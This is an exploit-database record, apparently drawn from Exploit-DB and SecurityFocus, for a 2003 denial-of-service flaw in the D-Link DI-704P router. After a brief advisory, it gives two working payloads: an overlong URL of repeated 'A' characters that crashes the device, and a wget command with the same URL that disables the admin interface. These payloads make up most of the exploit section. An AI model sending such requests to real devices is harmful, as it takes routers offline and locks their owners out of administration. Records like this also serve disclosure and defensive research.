ID
VAR-E-200308-0072
EDB ID
22991
TITLE
D-Link DI-704P - Long URL Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
D-Link DI-704P - Long URL Denial of Service.. dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | di-704p | scope: | - | version: | - | Trust: 1.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/8355/info
D-Link DI-704P has been reported prone to a remote denial of service vulnerability.
The issue presents itself when a request of excessive length is sent to the router. This causes the device to behave in an unstable manner.
Malicious requests may result in a complete denial of service condition requiring a device reboot, or the loss of the ability to log in to the administration interface.
Although unconfirmed, it should be noted that other D-Link devices that use related firmware might also be affected.
To disable the device entirely:
http://68.x.x.x:8080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
To prevent administration of the device from functioning:
wget
http://192.168.0.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Long URL Denial of Service
Trust: 1.0
CREDITS
chris@cr-secure.net
Trust: 0.6
EXTERNAL IDS
| db: | BID | id: | 8355 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 22991 | Trust: 1.6 |
| db: | EDBNET | id: | 45155 | Trust: 0.6 |
REFERENCES
| url: | https://www.securityfocus.com/bid/8355/info | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/22991/ | Trust: 0.6 |
| url: | http://www.dlink.com/products/broadband/di704p/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 8355 |
| db: | EXPLOIT-DB | id: | 22991 |
| db: | EDBNET | id: | 45155 |
LAST UPDATE DATE
2022-07-27T09:53:29.940000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 8355 | date: | 2003-08-06T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 8355 | date: | 2003-08-06T00:00:00 |
| db: | EXPLOIT-DB | id: | 22991 | date: | 2003-08-06T00:00:00 |
| db: | EDBNET | id: | 45155 | date: | 2003-08-06T00:00:00 |